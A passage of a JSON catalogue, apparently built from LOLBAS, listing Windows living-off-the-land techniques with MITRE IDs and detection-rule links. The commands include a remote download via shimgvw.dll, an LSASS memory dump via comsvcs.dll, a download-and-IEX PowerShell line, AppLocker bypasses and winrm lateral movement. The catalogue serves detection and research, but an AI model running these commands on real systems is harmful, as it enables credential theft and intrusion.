payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"]},{"id":"lolbas:shell32-dll:3","toolId":"lolbas:shell32-dll","toolName":"Shell32.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe shell32.dll,#44 {PATH:.dll}","description":"Load a DLL/CPL by calling undocumented Control_RunDLLNoFallback function.","usecase":"Load a DLL/CPL payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml"}],"references":["https://twitter.com/Hexacorn/status/885258886428725250","https://twitter.com/pabraeken/status/991768766898941953","https://twitter.com/mattifestation/status/776574940128485376","https://twitter.com/KyleHanslovan/status/905189665120149506","https://windows10dll.nirsoft.net/shell32_dll.html","https://www.hexacorn.com/blog/2025/05/18/shell32-dll-44-lolbin/","https://lolbas-project.github.io/lolbas/Libraries/Shell32/"]},{"id":"lolbas:shimgvw-dll:0","toolId":"lolbas:shimgvw-dll","toolName":"Shimgvw.dll","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"rundll32.exe c:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}","description":"Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.","usecase":"Download file from remote location.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\shimgvw.dll","c:\\windows\\syswow64\\shimgvw.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"IOC","value":"Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line"}],"references":["https://twitter.com/eral4m/status/1479080793003671557","https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/"]},{"id":"lolbas:syssetup-dll:0","toolId":"lolbas:syssetup-dll","toolName":"Syssetup.dll","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).","usecase":"Run local or remote script(let) code through INF file specification (Note May pop an error window).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml"}],"references":["https://twitter.com/pabraeken/status/994392481927258113","https://twitter.com/harr0ey/status/975350238184697857","https://twitter.com/bohops/status/975549525938135040","https://windows10dll.nirsoft.net/syssetup_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"]},{"id":"lolbas:syssetup-dll:1","toolId":"lolbas:syssetup-dll","toolName":"Syssetup.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}","description":"Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.","usecase":"Load an executable payload.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml"}],"references":["https://twitter.com/pabraeken/status/994392481927258113","https://twitter.com/harr0ey/status/975350238184697857","https://twitter.com/bohops/status/975549525938135040","https://windows10dll.nirsoft.net/syssetup_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"]},{"id":"lolbas:url-dll:0","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}","description":"Launch a HTML application payload by calling OpenURL.","usecase":"Invoke an HTML Application via mshta.exe (Default Handler).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:1","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url}","description":"Launch an executable payload via proxy through a .url (information) file by calling OpenURL.","usecase":"Load an executable payload by calling a .url file.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:2","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable by calling OpenURL.","usecase":"Load an executable payload by specifying the file protocol handler (obfuscated).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:3","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe}","description":"Launch an executable by calling FileProtocolHandler.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:4","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable by calling FileProtocolHandler.","usecase":"Load an executable payload by specifying the file protocol handler (obfuscated).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:url-dll:5","toolId":"lolbas:url-dll","toolName":"Url.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta","description":"Launch a HTML application payload by calling FileProtocolHandler.","usecase":"Invoke an HTML Application via mshta.exe (Default Handler).","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/","https://twitter.com/DissectMalware/status/995348436353470465","https://twitter.com/bohops/status/974043815655956481","https://twitter.com/yeyint_mth/status/997355558070927360","https://twitter.com/Hexacorn/status/974063407321223168","https://windows10dll.nirsoft.net/url_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Url/"]},{"id":"lolbas:zipfldr-dll:0","toolId":"lolbas:zipfldr-dll","toolName":"Zipfldr.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe}","description":"Launch an executable payload by calling RouteTheCall.","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/moriarty_meng/status/977848311603380224","https://twitter.com/bohops/status/997896811904929792","https://windows10dll.nirsoft.net/zipfldr_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"]},{"id":"lolbas:zipfldr-dll:1","toolId":"lolbas:zipfldr-dll","toolName":"Zipfldr.dll","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","description":"Launch an executable payload by calling RouteTheCall (obfuscated).","usecase":"Launch an executable.","mitre":["T1218.011"],"privilege":"user","fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://twitter.com/moriarty_meng/status/977848311603380224","https://twitter.com/bohops/status/997896811904929792","https://windows10dll.nirsoft.net/zipfldr_dll.html","https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"]},{"id":"lolbas:comsvcs-dll:0","toolId":"lolbas:comsvcs-dll","toolName":"Comsvcs.dll","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump {LSASS_PID} dump.bin full","description":"Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.","usecase":"Dump Lsass.exe process memory to retrieve credentials.","mitre":["T1003.001"],"privilege":"system","fullPath":["c:\\windows\\system32\\comsvcs.dll"],"toolType":"Library","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml"}],"references":["https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/","https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/"]},{"id":"lolbas:cl-loadassembly-ps1:0","toolId":"lolbas:cl-loadassembly-ps1","toolName":"CL_LoadAssembly.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell.exe -ep bypass -command \"set-location -path C:\\Windows\\diagnostics\\system\\Audio; import-module .\\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\\..\\..\\..\\testing\\fun.dll;[Program]::Fun()\"","description":"Proxy execute Managed DLL with PowerShell","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml"}],"references":["https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/","https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/"]},{"id":"lolbas:cl-mutexverifiers-ps1:0","toolId":"lolbas:cl-mutexverifiers-ps1","toolName":"CL_Mutexverifiers.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \\nrunAfterCancelProcess {PATH:.ps1}","description":"Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml"}],"references":["https://twitter.com/pabraeken/status/995111125447577600","https://lolbas-project.github.io/lolbas/Scripts/CL_Mutexverifiers/"]},{"id":"lolbas:cl-invocation-ps1:0","toolId":"lolbas:cl-invocation-ps1","toolName":"CL_Invocation.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":". C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \\nSyncInvoke {CMD}","description":"Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml"}],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Invocation/"]},{"id":"lolbas:launch-vsdevshell-ps1:0","toolId":"lolbas:launch-vsdevshell-ps1","toolName":"Launch-VsDevShell.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell -ep RemoteSigned -f .\\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe}","description":"Execute binaries from the context of the signed script using the \"VsWherePath\" flag.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml"}],"references":["https://twitter.com/nas_bench/status/1535981653239255040","https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"]},{"id":"lolbas:launch-vsdevshell-ps1:1","toolId":"lolbas:launch-vsdevshell-ps1","toolName":"Launch-VsDevShell.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell -ep RemoteSigned -f .\\Launch-VsDevShell.ps1 -VsInstallationPath \"/../../../../../; {PATH:.exe} ;\"","description":"Execute binaries and commands from the context of the signed script using the \"VsInstallationPath\" flag.","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml"}],"references":["https://twitter.com/nas_bench/status/1535981653239255040","https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"]},{"id":"lolbas:manage-bde-wsf:0","toolId":"lolbas:manage-bde-wsf","toolName":"Manage-bde.wsf","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"set comspec={PATH_ABSOLUTE:.exe} & cscript c:\\windows\\system32\\manage-bde.wsf","description":"Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.","usecase":"Proxy execution from script","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"},{"type":"IOC","value":"Manage-bde.wsf should not be invoked by a standard user under normal situations"}],"references":["https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712","https://twitter.com/bohops/status/980659399495741441","https://twitter.com/JohnLaTwC/status/1223292479270600706","https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"]},{"id":"lolbas:manage-bde-wsf:1","toolId":"lolbas:manage-bde-wsf","toolName":"Manage-bde.wsf","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"copy c:\\users\\person\\evil.exe c:\\users\\public\\manage-bde.exe & cd c:\\users\\public\\ & cscript.exe c:\\windows\\system32\\manage-bde.wsf","description":"Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.","usecase":"Proxy execution from script","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"},{"type":"IOC","value":"Manage-bde.wsf should not be invoked by a standard user under normal situations"}],"references":["https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712","https://twitter.com/bohops/status/980659399495741441","https://twitter.com/JohnLaTwC/status/1223292479270600706","https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"]},{"id":"lolbas:pubprn-vbs:0","toolId":"lolbas:pubprn-vbs","toolName":"Pubprn.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct}","description":"Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection","usecase":"Proxy execution","mitre":["T1216.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs","C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"],"toolType":"Script","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml"}],"references":["https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/","https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://github.com/enigma0x3/windows-operating-system-archaeology","https://lolbas-project.github.io/lolbas/Scripts/Pubprn/"]},{"id":"lolbas:syncappvpublishingserver-vbs:0","toolId":"lolbas:syncappvpublishingserver-vbs","toolName":"Syncappvpublishingserver.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SyncAppvPublishingServer.vbs \"n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX\"","description":"Inject PowerShell script code with the provided arguments","usecase":"Use Powershell host invoked from vbs script","mitre":["T1216.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml"}],"references":["https://twitter.com/monoxgas/status/895045566090010624","https://twitter.com/subTee/status/855738126882316288","https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"]},{"id":"lolbas:utilityfunctions-ps1:0","toolId":"lolbas:utilityfunctions-ps1","toolName":"UtilityFunctions.ps1","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"powershell.exe -ep bypass -command \"set-location -path c:\\windows\\diagnostics\\system\\networking; import-module .\\UtilityFunctions.ps1; RegSnapin ..\\..\\..\\..\\temp\\unsigned.dll;[Program.Class]::Main()\"","description":"Proxy execute Managed DLL with PowerShell","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml"}],"references":["https://twitter.com/nickvangilder/status/1441003666274668546","https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/"]},{"id":"lolbas:winrm-vbs:0","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winrm invoke Create wmicimv2/Win32_Process @{CommandLine=\"{CMD}\"} -r:http://target:5985","description":"Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol","usecase":"Proxy execution","mitre":["T1216"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"toolType":"Script","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology","https://www.youtube.com/watch?v=3gz1QmiMhss","https://github.com/enigma0x3/windows-operating-system-archaeology","https://redcanary.com/blog/lateral-movement-winrm-wmi/","https://twitter.com/bohops/status/994405551751815170","https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404","https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf","https://lolbas-project.github.io/lolbas/Scripts/winrm/"]},{"id":"lolbas:winrm-vbs:1","toolId":"lolbas:winrm-vbs","toolName":"winrm.vbs","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winrm invoke Create wmicimv2/Win32_Service @{Name=\"Evil\";DisplayName=\"Evil\";PathName=\"{CMD}\"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985","description":"Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol","usecase":"Proxy 